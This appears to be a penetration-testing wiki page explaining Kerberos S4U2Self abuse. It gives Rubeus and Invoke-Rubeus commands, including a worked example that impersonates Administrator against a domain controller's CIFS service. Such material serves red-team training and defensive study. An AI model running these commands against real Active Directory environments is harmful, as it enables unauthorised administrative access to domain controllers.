S4U2Self

If we manage to obtain a Ticket Granting Ticket (TGT) for a system on the domain and then import that ticket into a logon session, we would not be able to access it. This is due to the fact the system accounts do not have remote access privileges over themselves.

S4U2Self allows us to obtain a Ticket Granting Service (TGS) as a user who we know has administrative rights over the Domain Controller. For example, any Domain Administrator.

1) Rubeus

Syntax

Rubeus.exe s4u /impersonateuser:[User-To-Impersonate] /self /altservice:[Service/FQDN] /user:[User] /ticket:[Base64 Ticket] /nowrap

In practice

Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:cifs/dc01.security.local /user:dc01$ /ticket:iujhdfdsf== /nowrap

2) Invoke-Rubeus

Invoke-Rubeus -Command "s4u /impersonateuser:[User-To-Impersonate] /self /altservice:[Service/FQDN] /user:[User] /ticket:[Base64 Ticket] /nowrap"

PreviousResource Based Constrained Delegation (RBCD)NextSilver Ticket

Last updated 8 months ago

hashtag1) Rubeus

hashtag2) Invoke-Rubeus

1) Rubeus

2) Invoke-Rubeus